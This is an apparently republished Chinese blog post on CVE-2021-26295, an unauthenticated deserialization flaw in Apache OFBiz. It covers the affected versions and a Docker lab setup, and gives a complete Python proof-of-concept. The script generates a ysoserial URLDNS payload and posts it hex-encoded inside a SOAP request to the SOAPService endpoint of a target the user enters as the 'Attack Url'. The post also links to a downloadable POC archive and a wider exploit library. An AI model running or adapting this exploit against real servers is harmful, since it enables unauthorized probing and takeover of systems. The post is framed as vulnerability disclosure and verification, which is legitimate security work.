Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

admin

102252
文章

87
评论

2021年3月23日16:20:03评论181 views字数 2336阅读7分47秒阅读模式

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

一：漏洞描述🐑

OFBiz是基于Java的Web框架，包括实体引擎，服务引擎和基于小部件的UI。

近日，Apache OFBiz官方发布安全更新。Apache OFBiz 存在RMI反序列化前台命令执行，未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz，建议相关用户尽快测试漏洞修复的版本并及时升级。

二: 漏洞影响🐇

Apache OFBiz < 17.12.06

三: 漏洞复现🐋

Docker安装环境

docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

使用POC验证Dnslog响应

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

四: 漏洞POC🦉

下载地址 http://peiqi.tech/shentou/CVE-2021-26295.zipPOC参考了网上公开的几位师傅的脚本

import requestsimport sysimport sysimport subprocessimport binasciifrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():    print('+------------------------------------------')    print('+  33[34mPOC_Des: http://wiki.peiqi.tech                                   33[0m')    print('+  33[34mGithub : https://github.com/PeiQi0                                 33[0m')    print('+  33[34m公众号  : PeiQi文库                                                   33[0m')    print('+  33[34mVersion: Apache OFBiz                                            33[0m')    print('+  33[36m使用格式:  python3 poc.py                                            33[0m')    print('+  33[36mUrl         >>> http://xxx.xxx.xxx.xxx                             33[0m')    print('+  33[36mDnslog      >>> http://xxx.xxx.xxx.xxx                             33[0m')    print('+------------------------------------------')
def trans(s):    return "%s" % ''.join('%.2x' % x for x in s)
def POC_1(target_url, Dnslog):    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "URLDNS", Dnslog], stdout=subprocess.PIPE)    data = popen.stdout.read()    hex_data = trans(data)    headers = {        'Content-Type': 'text/xml'    }    post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><peiqi:clearAllEntityCaches xmlns:peiqi="http://ofbiz.apache.org/service/"><peiqi:cus-obj>%s</peiqi:cus-obj></peiqi:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data    vuln_url = target_url + "/webtools/control/SOAPService"    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)        print("33[36m[o] 正在请求 {}/webtools/control/SOAPService..... 33[0m".format(target_url))        if response.status_code == 200:            print("33[36m[o] 请检查 Dnslog 响应n 33[0m")        else:            print("33[31m[x] 请求失败 33[0m")            sys.exit(0)
    except Exception as e:        print("33[31m[x] 请求失败 33[0m")

if __name__ == '__main__':    title()    target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))    Dnslog = str(input("33[35mDnslog >>> 33[0m"))    POC_1(target_url, Dnslog)

五: 关于文库🦉

在线文库：

http://wiki.peiqi.tech

Github：

https://github.com/PeiQi0/PeiQi-WIKI-POC

最后

下面就是文库的公众号啦，更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐

文库接收文库中未收录的漏洞投稿啦，一起建设文库啦~

本文始发于微信公众号（PeiQi文库）：Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

左青龙
微信扫一扫

右白虎
微信扫一扫

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

最后

（CVE-2024-3400）Palo Alto Networks PAN-OS 命令执行漏洞

校园网自助服务系统存在SQL注入漏洞

玲珑-login-bypass登录绕过漏洞复现

用友-政务-FileDownload-任意文件读取漏洞复现

卡车卫星定位系统/user/create存在未授权密码重置漏洞

用友-U8-Cloud-TableInputOperServlet存在反序列化漏洞

CVE-2024-26503

致远互联 OA fileUpload.do 文件上传漏洞

某世界500强企业|存在通杀漏洞(0day)

CVE-2024-32409 POC

发表评论

在线咨询

微信